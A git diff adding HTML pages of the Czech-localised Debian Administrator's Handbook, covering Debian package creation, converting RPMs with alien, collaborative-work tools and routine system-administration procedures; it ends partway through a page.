+                class="programlisting">
+falcot-data (1.0) internal; urgency=low
+
+  * Initial Release.
+  * Let's start with few documents:
+    - internal company structure;
+    - contacts for each department.
+
+ -- Raphael Hertzog &lt;hertzog@debian.org&gt;  Fri, 04 Sep 2015 12:09:39 -0400
+</pre></div></div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.3.14"></a><p
+              class="title"><strong>Příklad 15.5. The <code
+                  class="filename">copyright</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Upstream-Name: falcot-data
+
+Files: *
+Copyright: 2004-2015 Falcot Corp
+License: 
+ All rights reserved.
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> <code
+                        class="filename">Makefile</code> file</strong></p></div></div></div><a
+              id="id-1.18.5.3.15.2"
+              class="indexterm"></a><div
+              class="para">
+				A <code
+                class="filename">Makefile</code> file is a script used by the <code
+                class="command">make</code> program; it describes rules for how to build a set of files from each other in a tree of dependencies (for instance, a program can be built from a set of source files). The <code
+                class="filename">Makefile</code> file describes these rules in the following format:
+			</div><pre
+              class="programlisting">
+target: source1 source2 ...
+        command1
+        command2
+</pre><div
+              class="para">
+				The interpretation of such a rule is as follows: if one of the <code
+                class="literal">source*</code> files is more recent than the <code
+                class="literal">target</code> file, then the target needs to be generated, using <code
+                class="command">command1</code> and <code
+                class="command">command2</code>.
+			</div><div
+              class="para">
+				Note that the command lines must start with a tab character; also note that when a command line starts with a dash character (<code
+                class="literal">-</code>), failure of the command does not interrupt the whole process.
+			</div></div><div
+            class="para">
+				The <code
+              class="filename">rules</code> file usually contains a set of rules used to configure, build and install the software in a dedicated subdirectory (named after the generated binary package). The contents of this subdirectory is then archived within the Debian package as if it were the root of the filesystem. In our case, files will be installed in the <code
+              class="filename">debian/falcot-data/usr/share/falcot-data/</code> subdirectory, so that installing the generated package will deploy the files under <code
+              class="filename">/usr/share/falcot-data/</code>. The <code
+              class="filename">rules</code> file is used as a <code
+              class="filename">Makefile</code>, with a few standard targets (including <code
+              class="literal">clean</code> and <code
+              class="literal">binary</code>, used respectively to clean the source directory and generate the binary package).
+			</div><div
+            class="para">
+				Although this file is the heart of the process, it increasingly contains only the bare minimum for running a standard set of commands provided by the <code
+              class="command">debhelper</code> tool. Such is the case for files generated by <code
+              class="command">dh_make</code>. To install our files, we simply configure the behavior of the <code
+              class="command">dh_install</code> command by creating the following <code
+              class="filename">debian/falcot-data.install</code> file:
+			</div><pre
+            class="programlisting">
+data/* usr/share/falcot-data/
+</pre><div
+            class="para">
+				At this point, the package can be created. We will however add a lick of paint. Since the administrators want the documents to be easily accessed from the menus of graphical desktop environments, we add a <code
+              class="filename">falcot-data.desktop</code> file and get it installed in <code
+              class="filename">/usr/share/applications</code> by adding a second line to <code
+              class="filename">debian/falcot-data.install</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.18.5.3.20"></a><p
+              class="title"><strong>Příklad 15.6. The <code
+                  class="filename">falcot-data.desktop</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+[Desktop Entry]
+Name=Internal Falcot Corp Documentation
+Comment=Starts a browser to read the documentation
+Exec=x-www-browser /usr/share/falcot-data/index.html
+Terminal=false
+Type=Application
+Categories=Documentation;
+</pre></div></div><div
+            class="para">
+				The updated <code
+              class="filename">debian/falcot-data.install</code> looks like this:
+			</div><pre
+            class="programlisting">
+data/* usr/share/falcot-data/
+falcot-data.desktop usr/share/applications/
+</pre><div
+            class="para">
+				Our source package is now ready. All that's left to do is to generate the binary package, with the same method we used previously for rebuilding packages: we run the <code
+              class="command">dpkg-buildpackage -us -uc</code> command from within the <code
+              class="filename">falcot-data-1.0</code> directory.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="debian-packaging.html"><strong>Předcházející</strong>Kapitola 15. Creating a Debian Package</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.setup-apt-package-repository.html"><strong>Další</strong>15.3. Creating a Package Repository for APT</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.coexistence-with-other-packaging-systems.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.coexistence-with-other-packaging-systems.html
new file mode 100644
index 000000000..cd944ba7d
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.coexistence-with-other-packaging-systems.html
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5.5. Coexistence with Other Packaging Systems</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="prev"
+        href="sect.manipulating-packages-with-dpkg.html"
+        title="5.4. Manipulating Packages with dpkg" /><link
+        rel="next"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.coexistence-with-other-packaging-systems.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.manipulating-packages-with-dpkg.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="apt.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.coexistence-with-other-packaging-systems"></a>5.5. Coexistence with Other Packaging Systems</h2></div></div></div><a
+          id="id-1.8.9.2"
+          class="indexterm"></a><a
+          id="id-1.8.9.3"
+          class="indexterm"></a><a
+          id="id-1.8.9.4"
+          class="indexterm"></a><div
+          class="para">
+			Debian packages are not the only software packages used in the free software world. The main competitor is the RPM format of the Red Hat Linux distribution and its many derivatives. Red Hat is a very popular, commercial distribution. It is thus common for software provided by third parties to be offered as RPM packages rather than Debian.
+		</div><div
+          class="para">
+			In this case, you should know that the program <code
+            class="command">rpm</code>, which handles RPM packages, is available as a Debian package, so it is possible to use this package format on Debian. Care should be taken, however, to limit these manipulations to extract the information from a package or to verify its integrity. It is, in truth, unreasonable to use <code
+            class="command">rpm</code> to install an RPM on a Debian system; RPM uses its own database, separate from those of native software (such as <code
+            class="command">dpkg</code>). This is why it is not possible to ensure a stable coexistence of two packaging systems.
+		</div><div
+          class="para">
+			On the other hand, the <span
+            class="pkg pkg">alien</span> utility can convert RPM packages into Debian packages, and vice versa.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMMUNITY</em></span> Encouraging the adoption of <code
+                      class="filename">.deb</code></strong></p></div></div></div><div
+            class="para">
+			If you regularly use the <code
+              class="command">alien</code> program to install RPM packages coming from one of your providers, do not hesitate to write to them and amicably express your strong preference for the <code
+              class="filename">.deb</code> format. Note that the format of the package is not everything: a <code
+              class="filename">.deb</code> package built with <code
+              class="command">alien</code> or prepared for a version of Debian different than that which you use, or even for a derivative distribution like Ubuntu, would probably not offer the same level of quality and integration as a package specifically developed for Debian <span
+              class="distribution distribution">Stretch</span>.
+		</div></div><pre
+          class="screen">
+<code
+            class="computeroutput">$ </code><strong
+            class="userinput"><code>fakeroot alien --to-deb phpMyAdmin-4.7.5-2.fc28.noarch.rpm</code></strong>
+<code
+            class="computeroutput">phpmyadmin_4.7.5-3_all.deb generated
+$ </code><strong
+            class="userinput"><code>ls -s phpmyadmin_4.7.5-3_all.deb</code></strong>
+<code
+            class="computeroutput">  4356 phpmyadmin_4.7.5-3_all.deb</code></pre><div
+          class="para">
+			You will find that this process is extremely simple. You must know, however, that the package generated does not have any dependency information, since the dependencies in the two packaging formats don't have systematic correspondence. The administrator must thus manually ensure that the converted package will function correctly, and this is why Debian packages thus generated should be avoided as much as possible. Fortunately, Debian has the largest collection of software packages of all distributions, and it is likely that whatever you seek is already in there.
+		</div><div
+          class="para">
+			Looking at the man page for the <code
+            class="command">alien</code> command, you will also note that this program handles other packaging formats, especially the one used by the Slackware distribution (it is made of a simple <code
+            class="filename">tar.gz</code> archive).
+		</div><div
+          class="para">
+			The stability of the software deployed using the <code
+            class="command">dpkg</code> tool contributes to Debian's fame. The APT suite of tools, described in the following chapter, preserves this advantage, while relieving the administrator from managing the status of packages, a necessary but difficult task.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.manipulating-packages-with-dpkg.html"><strong>Předcházející</strong>5.4. Manipulating Packages with dpkg</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="apt.html"><strong>Další</strong>Kapitola 6. Maintenance and Updates: The APT Tools</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.collaborative-work.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.collaborative-work.html
new file mode 100644
index 000000000..8eea17e2e
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.collaborative-work.html
@@ -0,0 +1,153 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.7. Collaborative Work</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.development.html"
+        title="13.6. Development" /><link
+        rel="next"
+        href="sect.office-suites.html"
+        title="13.8. Office Suites" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.collaborative-work.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.development.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.office-suites.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.collaborative-work"></a>13.7. Collaborative Work</h2></div></div></div><a
+          id="id-1.16.10.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.10.3"></a>13.7.1. Working in Groups: <span
+                    class="foreignphrase"><em
+                      class="foreignphrase">groupware</em></span></h3></div></div></div><a
+            id="id-1.16.10.3.2"
+            class="indexterm"></a><div
+            class="para">
+				Groupware tools tend to be relatively complex to maintain because they aggregate multiple tools and have requirements that are not always easy to reconcile in the context of an integrated distribution. Thus there is a long list of groupware packages that were once available in Debian but have been dropped for lack of maintainers or incompatibility with other (newer) software in Debian. This has been the case with PHPGroupware, eGroupware, and Kolab. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.egroupware.org/">http://www.egroupware.org/</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.kolab.org/">https://www.kolab.org/</a></div>
+			</div><a
+            id="id-1.16.10.3.4"
+            class="indexterm"></a><a
+            id="id-1.16.10.3.5"
+            class="indexterm"></a><div
+            class="para">
+				All is not lost though. Many of the features traditionally provided by “groupware” software are increasingly integrated into “standard” software. This is reducing the requirement for specific, specialized groupware software. On the other hand, this usually requires a specific server. Citadel (in the <span
+              class="pkg pkg">citadel-suite</span> package) and Sogo (in the <span
+              class="pkg pkg">sogo</span> package) are alternatives that are available in Debian <span
+              class="distribution distribution">Stretch</span>.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.10.4"></a>13.7.2. Collaborative Work With FusionForge</h3></div></div></div><a
+            id="id-1.16.10.4.2"
+            class="indexterm"></a><div
+            class="para">
+				FusionForge is a collaborative development tool with some ancestry in SourceForge, a hosting service for free software projects. It takes the same overall approach based on the standard development model for free software. The software itself has kept evolving after the SourceForge code went proprietary. Its initial authors, VA Software, decided not to release any more free versions. The same happened again when the first fork (GForge) followed the same path. Since various people and organizations have participated in development, the current FusionForge also includes features targeting a more traditional approach to development, as well as projects not purely concerned with software development.
+			</div><a
+            id="id-1.16.10.4.4"
+            class="indexterm"></a><div
+            class="para">
+				FusionForge can be seen as an amalgamation of several tools dedicated to manage, track and coordinate projects. These tools can be roughly classified into three families:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<span
+                    class="emphasis"><em>communication</em></span>: web forums, mailing-list manager, and announcement system allowing a project to publish news
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<span
+                    class="emphasis"><em>tracking</em></span>: tools to track project progress and schedule tasks, to track bugs, feature requests, or any other kind of “ticket”, and to run surveys
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<span
+                    class="emphasis"><em>sharing</em></span>: documentation manager to provide a single central point for documents related to a project, generic file release manager, dedicated website for each project.
+					</div></li></ul></div><div
+            class="para">
+				Since FusionForge largely targets development projects, it also integrates many tools such as CVS, Subversion, Git, Bazaar, Darcs, Mercurial and Arch for source control management (also called “configuration management” or “version control”). These programs keep a history of all the revisions of all tracked files (often source code files), with all the changes they go through, and they can merge modifications when several developers work simultaneously on the same part of a project.
+			</div><div
+            class="para">
+				Most of these tools can be accessed or even managed through a web interface, with a fine-grained permission system, and email notifications for some events.
+			</div><div
+            class="para">
+				Unfortunately, FusionForge is not part of Debian <span
+              class="distribution distribution">Stretch</span>. It is a large software stack that is hard to maintain properly and benefits only few users who are usually expert enough to be able to backport the package from Debian <span
+              class="distribution distribution">Unstable</span>.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.development.html"><strong>Předcházející</strong>13.6. Development</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.office-suites.html"><strong>Další</strong>13.8. Office Suites</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.common-procedures.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.common-procedures.html
new file mode 100644
index 000000000..8fd0e1aaa
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.common-procedures.html
@@ -0,0 +1,293 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">7.2. Common Procedures</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Documentation, Solving problems, Log files, README.Debian, Manual, info" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="solving-problems.html"
+        title="Kapitola 7. Solving Problems and Finding Relevant Information" /><link
+        rel="prev"
+        href="solving-problems.html"
+        title="Kapitola 7. Solving Problems and Finding Relevant Information" /><link
+        rel="next"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.common-procedures.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="solving-problems.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="basic-configuration.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.common-procedures"></a>7.2. Common Procedures</h2></div></div></div><a
+          id="id-1.10.5.2"
+          class="indexterm"></a><div
+          class="para">
+			The purpose of this section is to present some general tips on certain operations that an administrator will frequently have to perform. These procedures will of course not cover every possible case in an exhaustive way, but they may serve as starting points for the more difficult cases.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>DISCOVERY</em></span> Documentation in other languages</strong></p></div></div></div><div
+            class="para">
+			Often, documentation translated into a non-English language is available in a separate package with the name of the corresponding package, followed by <code
+              class="literal">-<em
+                class="replaceable">lang</em></code> (where <em
+              class="replaceable">lang</em> is the two-letter ISO code for the language).
+		</div><div
+            class="para">
+			For instance, the <span
+              class="emphasis"><em>apt-howto-fr</em></span> package contains the French translation of the howto for <span
+              class="emphasis"><em>APT</em></span>. Likewise, the <span
+              class="emphasis"><em>quick-reference-fr</em></span> and <span
+              class="emphasis"><em>debian-reference-fr</em></span> packages are the French versions of the reference guides for Debian (initially written in English by Osamu Aoki).
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.10.5.5"></a>7.2.1. Configuring a Program</h3></div></div></div><a
+            id="id-1.10.5.5.2"
+            class="indexterm"></a><a
+            id="id-1.10.5.5.3"
+            class="indexterm"></a><div
+            class="para">
+				When you want to configure an unknown package, you must proceed in stages. First, you should read what the package maintainer has documented. Reading <code
+              class="filename">/usr/share/doc/<em
+                class="replaceable">package</em>/README.Debian</code> will indeed allow you to learn of specific provisions made to simplify the use of the software. It is sometimes essential in order to understand the differences from the original behavior of the program, as described in the general documentation, such as howtos. Sometimes this file also details the most common errors in order for you to avoid wasting time on common problems.
+			</div><div
+            class="para">
+				Then, you should look at the software's official documentation — refer to <a
+              class="xref"
+              href="solving-problems.html#sect.documentation-sources">7.1 – „Documentation Sources“</a> to identify the various existing documentation sources. The <code
+              class="command">dpkg -L <em
+                class="replaceable">package</em></code> command gives a list of files included in the package; you can therefore quickly identify the available documentation (as well as the configuration files, located in <code
+              class="filename">/etc/</code>). <code
+              class="command">dpkg -s <em
+                class="replaceable">package</em></code> displays the package meta-data and shows any possible recommended or suggested packages; in there, you can find documentation or a utility that will ease the configuration of the software.
+			</div><div
+            class="para">
+				Finally, the configuration files are often self-documented by many explanatory comments detailing the various possible values for each configuration setting. So much so that it is sometimes enough to just choose a line to activate from among those available. In some cases, examples of configuration files are provided in the <code
+              class="filename">/usr/share/doc/<em
+                class="replaceable">package</em>/examples/</code> directory. They may serve as a basis for your own configuration file.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DEBIAN POLICY</em></span> Location of examples</strong></p></div></div></div><a
+              id="id-1.10.5.5.7.2"
+              class="indexterm"></a><div
+              class="para">
+				All examples must be installed in the <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/examples/</code> directory. This may be a configuration file, program source code (an example of the use of a library), or a data conversion script that the administrator can use in certain cases (such as to initialize a database). If the example is specific to a particular architecture, it should be installed in <code
+                class="filename">/usr/lib/<em
+                  class="replaceable">package</em>/examples/</code> and there should be a link pointing to that file in the <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/examples/</code> directory.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.10.5.6"></a>7.2.2. Monitoring What Daemons Are Doing</h3></div></div></div><div
+            class="para">
+				Understanding what a daemon does is somewhat more complicated, since it does not interact directly with the administrator. To check that a daemon is actually working, you need to test it. For example, to check the Apache (web server) daemon, test it with an HTTP request.
+			</div><div
+            class="para">
+				To allow such tests, each daemon generally records everything that it does, as well as any errors that it encounters, in what are called “log files” or “system logs”. Logs are stored in <code
+              class="filename">/var/log/</code> or one of its subdirectories. To know the precise name of a log file for each daemon, see its documentation. Note: a single test is not always sufficient if it does not cover all the possible usage cases; some problems only occur in particular circumstances.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> The <code
+                        class="command">rsyslogd</code> daemon</strong></p></div></div></div><a
+              id="id-1.10.5.6.4.2"
+              class="indexterm"></a><a
+              id="id-1.10.5.6.4.3"
+              class="indexterm"></a><a
+              id="id-1.10.5.6.4.4"
+              class="indexterm"></a><div
+              class="para">
+				<code
+                class="command">rsyslogd</code> is special: it collects logs (internal system messages) that are sent to it by other programs. Each log entry is associated with a subsystem (e-mail, kernel, authentication, etc.) and a priority; <code
+                class="command">rsyslogd</code> processes these two pieces of information to decide on what to do. The log message may be recorded in various log files, and/or sent to an administration console. The details are defined in the <code
+                class="filename">/etc/rsyslog.conf</code> configuration file (documented in the manual page of the same name).
+			</div><div
+              class="para">
+				Certain C functions, which are specialized in sending logs, simplify the use of the <code
+                class="command">rsyslogd</code> daemon. However some daemons manage their own log files (this is the case, for example, of <code
+                class="command">samba</code>, that implements Windows shares on Linux).
+			</div><div
+              class="para">
+				Note that when <code
+                class="command">systemd</code> is in use, the logs are actually collected by <code
+                class="command">systemd</code> before being forwarded to <code
+                class="command">rsyslogd</code>. They are thus also available via <code
+                class="command">systemd</code>'s journal and can be consulted with <code
+                class="command">journalctl</code> (see <a
+                class="xref"
+                href="unix-services.html#sect.systemd">9.1.1 – „The systemd init system“</a> for details).
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Daemon</strong></p></div></div></div><a
+              id="id-1.10.5.6.5.2"
+              class="indexterm"></a><div
+              class="para">
+				A daemon is a program that is not explicitly invoked by the user and that stays in the background, waiting for a certain condition to be met before performing a task. Many server programs are daemons, a term that explains that the letter “d” is frequently present at the end of their name (<code
+                class="command">sshd</code>, <code
+                class="command">smtpd</code>, <code
+                class="command">httpd</code>, etc.).
+			</div></div><div
+            class="para">
+				As a preventive operation, the administrator should regularly read the most relevant server logs. They can thus diagnose problems before they are even reported by disgruntled users. Indeed users may sometimes wait for a problem to occur repeatedly over several days before reporting it. In many cases, there are specific tools to analyze the contents of the larger log files. In particular, such utilities exist for web servers (such as <code
+              class="command">analog</code>, <code
+              class="command">awstats</code>, <code
+              class="command">webalizer</code> for Apache), for FTP servers, for proxy/cache servers, for firewalls, for e-mail servers, for DNS servers, and even for print servers. Other tools, such as <code
+              class="command">logcheck</code> (a software discussed in <a
+              class="xref"
+              href="security.html">14 – „<em>Security</em>“</a>), scan these files in search of alerts to be dealt with.
+			</div><a
+            id="id-1.10.5.6.7"
+            class="indexterm"></a><a
+            id="id-1.10.5.6.8"
+            class="indexterm"></a><a
+            id="id-1.10.5.6.9"
+            class="indexterm"></a><a
+            id="id-1.10.5.6.10"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.10.5.7"></a>7.2.3. Asking for Help on a Mailing List</h3></div></div></div><div
+            class="para">
+				If your various searches haven't helped you to get to the root of a problem, it is possible to get help from other, perhaps more experienced people. This is exactly the purpose of the <code
+              class="email"><a
+                class="email"
+                href="mailto:debian-user@lists.debian.org">debian-user@lists.debian.org</a></code> mailing list. As with any community, it has rules that need to be followed. Before asking any question, you should check that your problem isn't already covered by recent discussions on the list or by any official documentation. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/DebianMailingLists">https://wiki.debian.org/DebianMailingLists</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://lists.debian.org/debian-user/">https://lists.debian.org/debian-user/</a></div>
+			</div><a
+            id="id-1.10.5.7.3"
+            class="indexterm"></a><a
+            id="id-1.10.5.7.4"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Netiquette applies</strong></p></div></div></div><div
+              class="para">
+				In general, for all correspondence on e-mail lists, the rules of Netiquette should be followed. This term refers to a set of common sense rules, from common courtesy to mistakes that should be avoided. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://tools.ietf.org/html/rfc1855">http://tools.ietf.org/html/rfc1855</a></div> <a
+                id="id-1.10.5.7.5.2.2"
+                class="indexterm"></a>
+			</div><div
+              class="para">
+				Furthermore, for any communication channel managed by the Debian project, you are bound by the Debian Code of Conduct: <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/code_of_conduct">https://www.debian.org/code_of_conduct</a></div>
+			</div></div><div
+            class="para">
+				Once those two conditions are met, you can think of describing your problem to the mailing list. Include as much relevant information as possible: various tests conducted, documentation consulted, how you attempted to diagnose the problem, the packages concerned or those that may be involved, etc. Check the Debian Bug Tracking System (BTS, described in sidebar <a
+              class="xref"
+              href="sect.debian-internals.html#sidebar.bts"><span
+                class="emphasis"><em>NÁSTROJ</em></span> Systém na sledování chyb</a>) for similar problems, and mention the results of that search, providing links to bugs found. BTS starts on: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.debian.org/Bugs/index.html">http://www.debian.org/Bugs/index.html</a></div>
+			</div><div
+            class="para">
+				The more courteous and precise you have been, the greater your chances are of getting an answer, or, at least, some elements of response. If you receive relevant information by private e-mail, think of summarizing this information publicly so that others can benefit. This also allows the list's archives, searched through various search engines, to show the resolution for others who may have the same question.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.10.5.8"></a>7.2.4. Reporting a Bug When a Problem Is Too Difficult</h3></div></div></div><a
+            id="id-1.10.5.8.2"
+            class="indexterm"></a><a
